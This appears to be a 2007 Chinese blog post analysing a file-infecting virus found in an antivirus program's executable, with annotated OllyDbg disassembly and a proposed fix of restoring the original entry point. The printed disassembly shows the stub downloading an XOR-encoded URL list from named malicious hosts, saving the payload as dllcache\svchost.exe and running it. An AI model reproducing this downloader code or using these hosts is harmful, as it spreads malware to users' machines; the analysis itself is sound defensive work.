一感染文件不完全修复~~_浮萍漂泊本无根,天涯游子君莫问!

查看文章

一感染文件不完全修复~~

2007年10月16日星期二 22:35

凝逸的求助我就稍微看了一下~他说的所谓加密入口点的感染病毒样本~

下到样本发现是凝逸的杀软主程序~

00607441 >   E8 00000000               call nyfd.00607446                            ;OD载入~~
00607446     5D                        pop ebp
00607447     81ED 46746000             sub ebp,nyfd.00607446
0060744D     8B0424                    mov eax,dword ptr ss:[esp]
00607450     25 0000FFFF               and eax,FFFF0000
00607455     8138 4D5A9000             cmp dword ptr ds:[eax],905A4D
0060745B     74 07                     je short nyfd.00607464
0060745D     2D 00100000               sub eax,1000
00607462   ^ EB F1                     jmp short nyfd.00607455                        ;初始化API
00607464     55                        push ebp
00607465     53                        push ebx
00607466     56                        push esi
00607467     57                        push edi
00607468     8BE8                      mov ebp,eax
0060746A     0340 3C                   add eax,dword ptr ds:[eax+3C]
0060746D     8B78 78                   mov edi,dword ptr ds:[eax+78]
00607470     03FD                      add edi,ebp
00607472     8B77 20                   mov esi,dword ptr ds:[edi+20]
00607475     03F5                      add esi,ebp
00607477     33D2                      xor edx,edx
00607479     8B06                      mov eax,dword ptr ds:[esi]
0060747B     03C5                      add eax,ebp
0060747D     8138 47657450             cmp dword ptr ds:[eax],50746547
00607483     75 32                     jnz short nyfd.006074B7
00607485     8178 04 726F6341          cmp dword ptr ds:[eax+4],41636F72
0060748C     75 29                     jnz short nyfd.006074B7
0060748E     8178 08 64647265          cmp dword ptr ds:[eax+8],65726464
00607495     75 20                     jnz short nyfd.006074B7
00607497     66:8178 0C 7373           cmp word ptr ds:[eax+C],7373
0060749D     75 18                     jnz short nyfd.006074B7
0060749F     8B47 24                   mov eax,dword ptr ds:[edi+24]
006074A2     03C5                      add eax,ebp
006074A4     0FB71C50                  movzx ebx,word ptr ds:[eax+edx*2]
006074A8     8B47 1C                   mov eax,dword ptr ds:[edi+1C]
006074AB     03C5                      add eax,ebp
006074AD     8B0498                    mov eax,dword ptr ds:[eax+ebx*4]
006074B0     03C5                      add eax,ebp
006074B2     A3 2B706000               mov dword ptr ds:[60702B],eax
006074B7     83C6 04                   add esi,4
006074BA     42                        inc edx
006074BB     3B57 18                   cmp edx,dword ptr ds:[edi+18]
006074BE   ^ 75 B9                     jnz short nyfd.00607479                             ;这个循环就是分配api
006074C0     68 77706000               push nyfd.00607077                          ; freelibrary
006074C5     55                        push ebp
006074C6     FF15 2B706000             call dword ptr ds:[60702B]
006074CC     A3 33706000               mov dword ptr ds:[607033],eax
006074D1     68 83706000               push nyfd.00607083                          ; exitprocess
006074D6     55                        push ebp
.....................................

0060758C     68 63706000               push nyfd.00607063                          ; urlmon
00607591     FF15 2F706000             call dword ptr ds:[60702F]
00607597     A3 23706000               mov dword ptr ds:[607023],eax
0060759C     52                        push edx
0060759D     8D15 AC706000             lea edx,dword ptr ds:[6070AC]
006075A3     52                        push edx
006075B1     A3 5B706000               mov dword ptr ds:[60705B],eax               ; urlmon.URLDownloadToFileA
006075AA     FF15 2B706000             call dword ptr ds:[60702B]                       ;注意这里要下病毒~跟进去
006075B0     5A                        pop edx
006075B1     A3 5B706000               mov dword ptr ds:[60705B],eax
006075B6     E8 1B000000               call nyfd.006075D6
006075BB     A1 00706000               mov eax,dword ptr ds:[607000]
006075C0     FFE0                      jmp eax                                              ;跳到真正软件的OEP

006075D6     55                        push ebp                                    ; kernel32.7C800000
006075D7     8BEC                      mov ebp,esp
006075D9     81C4 38FDFFFF             add esp,-2C8
006075DF     C785 38FFFFFF 68740000    mov dword ptr ss:[ebp-C8],7468          ;这些字符就是病毒的更新文件地址http://www.we168.org/Data/a.txt
006075E9     C785 3AFFFFFF 74700000    mov dword ptr ss:[ebp-C6],7074
006075F3     C785 3CFFFFFF 3A2F0000    mov dword ptr ss:[ebp-C4],2F3A
006075FD     C785 3EFFFFFF 2F770000    mov dword ptr ss:[ebp-C2],772F
00607607     C785 40FFFFFF 77770000    mov dword ptr ss:[ebp-C0],7777
00607611     C785 42FFFFFF 2E770000    mov dword ptr ss:[ebp-BE],772E
0060761B     C785 44FFFFFF 65310000    mov dword ptr ss:[ebp-BC],3165
00607625     C785 46FFFFFF 36380000    mov dword ptr ss:[ebp-BA],3836
0060762F     C785 48FFFFFF 2E6F0000    mov dword ptr ss:[ebp-B8],6F2E
00607639     C785 4AFFFFFF 72670000    mov dword ptr ss:[ebp-B6],6772
00607643     C785 4CFFFFFF 2F440000    mov dword ptr ss:[ebp-B4],442F
0060764D     C785 4EFFFFFF 61740000    mov dword ptr ss:[ebp-B2],7461
00607657     C785 50FFFFFF 612F0000    mov dword ptr ss:[ebp-B0],2F61
00607661     C785 52FFFFFF 612E0000    mov dword ptr ss:[ebp-AE],2E61
0060766B     C785 54FFFFFF 74780000    mov dword ptr ss:[ebp-AC],7874
00607675     C685 56FFFFFF 74          mov byte ptr ss:[ebp-AA],74
0060767C     C685 57FFFFFF 00          mov byte ptr ss:[ebp-A9],0
00607683     68 04010000               push 104
00607688     68 35716000               push nyfd.00607135
0060768D     FF15 57706000             call dword ptr ds:[607057]                  ; kernel32.GetSystemDirectoryA                 ;获得SYSTEM32目录下载创建文件system.bak和system.log
00607693     68 1D716000               push nyfd.0060711D                          ; \system.bak
00607698     68 35716000               push nyfd.00607135
0060769D     FF15 3B706000             call dword ptr ds:[60703B]                  ; kernel32.lstrcatA
006076A3     8D9D 38FFFFFF             lea ebx,dword ptr ss:[ebp-C8]
006076A9     6A 00                     push 0
006076AB     6A 00                     push 0
006076AD     68 35716000               push nyfd.00607135
006076B2     53                        push ebx
006076B3     6A 00                     push 0
006076B5     FF15 5B706000             call dword ptr ds:[60705B]                  ; urlmon.URLDownloadToFileA                     下载
006076BB     6A 00                     push 0
006076BD     68 80000000               push 80
006076C2     6A 03                     push 3
006076C4     6A 00                     push 0
006076C6     6A 01                     push 1
006076C8     68 00000080               push 80000000
006076CD     68 35716000               push nyfd.00607135
006076D2     FF15 43706000             call dword ptr ds:[607043]                  ; kernel32.CreateFileA
006076D8     83F8 FF                   cmp eax,-1
006076DB     75 05                     jnz short nyfd.006076E2
006076DD     E9 67010000               jmp nyfd.00607849
006076E2     8985 40FDFFFF             mov dword ptr ss:[ebp-2C0],eax
006076E8     8D95 A8FDFFFF             lea edx,dword ptr ss:[ebp-258]
006076EE     8D8D 38FDFFFF             lea ecx,dword ptr ss:[ebp-2C8]
006076F4     6A 00                     push 0
006076F6     51                        push ecx
006076F7     6A 64                     push 64
006076F9     52                        push edx
006076FA     FFB5 40FDFFFF             push dword ptr ss:[ebp-2C0]
00607700     FF15 47706000             call dword ptr ds:[607047]                  ; kernel32.ReadFile
00607706     FFB5 40FDFFFF             push dword ptr ss:[ebp-2C0]
0060770C     FF15 4B706000             call dword ptr ds:[60704B]                  ; kernel32.CloseHandle
00607712     8B8D 38FDFFFF             mov ecx,dword ptr ss:[ebp-2C8]
00607718     36:C68429 A8FDFFFF 00     mov byte ptr ss:[ecx+ebp-258],0
00607721     8B8D 38FDFFFF             mov ecx,dword ptr ss:[ebp-2C8]
00607727     36:81B429 A7FDFFFF 90000>xor dword ptr ss:[ecx+ebp-259],90
00607733   ^ E2 F2                     loopd short nyfd.00607727                        ;   读去a.txt文件的内容和90异或解密算出病毒母体地址
00607735     68 04010000               push 104
0060773A     68 39726000               push nyfd.00607239
0060773F     FF15 57706000             call dword ptr ds:[607057]                  ; kernel32.GetSystemDirectoryA
00607745     68 29716000               push nyfd.00607129                          ; \system.log
0060774A     68 39726000               push nyfd.00607239
0060774F     FF15 3B706000             call dword ptr ds:[60703B]                  ; kernel32.lstrcatA
00607755     6A 00                     push 0
00607757     68 80000000               push 80
0060775C     6A 03                     push 3
0060775E     6A 00                     push 0
00607760     6A 01                     push 1
00607762     68 00000080               push 80000000
00607767     68 39726000               push nyfd.00607239
0060776C     FF15 43706000             call dword ptr ds:[607043]                  ; kernel32.CreateFileA
00607772     83F8 FF                   cmp eax,-1
00607775     75 02                     jnz short nyfd.00607779
00607777     EB 68                     jmp short nyfd.006077E1
00607779     8985 40FDFFFF             mov dword ptr ss:[ebp-2C0],eax
0060777F     8D95 44FDFFFF             lea edx,dword ptr ss:[ebp-2BC]
00607785     8D8D 3CFDFFFF             lea ecx,dword ptr ss:[ebp-2C4]
0060778B     6A 00                     push 0
0060778D     51                        push ecx
0060778E     6A 64                     push 64
00607790     52                        push edx
00607791     FFB5 40FDFFFF             push dword ptr ss:[ebp-2C0]
00607797     FF15 47706000             call dword ptr ds:[607047]                  ; kernel32.ReadFile
0060779D     FFB5 40FDFFFF             push dword ptr ss:[ebp-2C0]
006077A3     FF15 4B706000             call dword ptr ds:[60704B]                  ; kernel32.CloseHandle
006077A9     8B8D 3CFDFFFF             mov ecx,dword ptr ss:[ebp-2C4]
006077AF     36:C68429 44FDFFFF 00     mov byte ptr ss:[ecx+ebp-2BC],0
006077B8     8B8D 3CFDFFFF             mov ecx,dword ptr ss:[ebp-2C4]
006077BE     36:80B429 43FDFFFF 90     xor byte ptr ss:[ecx+ebp-2BD],90
006077C7   ^ E2 F5                     loopd short nyfd.006077BE              ;http://isa.31joy.coM/Images/Hide/m1.exE    下不料,估计是下载后保存到SYSTEM32dllcache\svchost.exE文件,然后运行~
006077C9     8D95 A8FDFFFF             lea edx,dword ptr ss:[ebp-258]
006077CF     8D8D 44FDFFFF             lea ecx,dword ptr ss:[ebp-2BC]
006077D5     51                        push ecx
006077D6     52                        push edx
006077D7     FF15 3F706000             call dword ptr ds:[60703F]                  ; kernel32.lstrcmpiA
006077DD     0BC0                      or eax,eax
006077DF     74 68                     je short nyfd.00607849
006077E1     68 04010000               push 104
006077E6     68 3D736000               push nyfd.0060733D
006077EB     FF15 57706000             call dword ptr ds:[607057]                  ; kernel32.GetSystemDirectoryA
006077F1     68 07716000               push nyfd.00607107                          ; \dllcache\svchost.exe
006077F6     68 3D736000               push nyfd.0060733D
006077FB     FF15 3B706000             call dword ptr ds:[60703B]                  ; kernel32.lstrcatA
00607801     8D9D A8FDFFFF             lea ebx,dword ptr ss:[ebp-258]
00607807     6A 00                     push 0
00607809     6A 00                     push 0
0060780B     68 3D736000               push nyfd.0060733D
00607810     53                        push ebx
00607811     6A 00                     push 0
00607813     FF15 5B706000             call dword ptr ds:[60705B]                  ; urlmon.URLDownloadToFileA
00607819     6A 00                     push 0
0060781B     68 3D736000               push nyfd.0060733D
00607820     FF15 5F706000             call dword ptr ds:[60705F]                  ; kernel32.WinExec
00607826     6A 00                     push 0
00607828     8D15 39726000             lea edx,dword ptr ds:[607239]
0060782E     52                        push edx
0060782F     8D15 35716000             lea edx,dword ptr ds:[607135]
00607835     52                        push edx
00607836     FF15 4F706000             call dword ptr ds:[60704F]                  ; kernel32.CopyFileA
0060783C     8D15 35716000             lea edx,dword ptr ds:[607135]
00607842     52                        push edx
00607843     FF15 53706000             call dword ptr ds:[607053]                  ; kernel32.DeleteFileA
00607849     C9                        leave
0060784A     C3                        retn

由于没有母体不能跟踪如何捆绑的不过肯定的是该病毒没有加密入口点,而是把入口点保存在607000地址里~目前临时解决的办法获取原程序入口点然后修改,使病毒体不能运行~~

类别：西毒 | 添加到搜藏 | 浏览() | 评论 (6)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	请点击后输入四位验证码，字母不区分大小写看不清?
	取消回复